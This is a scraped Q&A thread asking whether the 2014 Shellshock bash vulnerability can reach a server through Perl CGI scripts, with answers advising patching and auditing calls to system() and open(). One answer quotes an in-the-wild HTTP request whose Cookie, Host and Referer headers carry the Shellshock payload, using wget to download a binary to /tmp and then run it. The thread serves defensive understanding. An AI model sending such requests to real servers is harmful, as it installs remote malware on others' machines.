The bash vulnerability CVE-2014-6271 . Can it affe

2019-04-16 02:26发布

问题:

Yesterday the problem CVE-2014-6271 was reported which is the BASH Shellshock vulnerability. I am trying to understand if it can affect my server via my Perl CGI scripts.

Can my code be affected in a malicious way - what would my code need to do to be affected? What should I check to verify this?

回答1:

Yes it affects Perl if your CGI script spawns subshells, e.g., using the system() or open() functions or backticks. See this excellent Red Hat blog post. Note that the blog post is not Red Hat specific in any significant way.

Check your Perl CGI scripts for these functions, BUT FIRST UPGRADE BASH TO A FIXED VERSION!



回答2:

You could try to set special crafted strings to the HTTP server als Referrer, Cookie, Host or Accept header which are then passed to (bash) CGI scripts:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Host:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Referer:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Accept:./

See https://gist.github.com/anonymous/929d622f3b36b00c0be1 as a real world example of malware which was seen in the wild.

If your Perl scripts do not call bash (by using system or open) you should be safe.

See https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/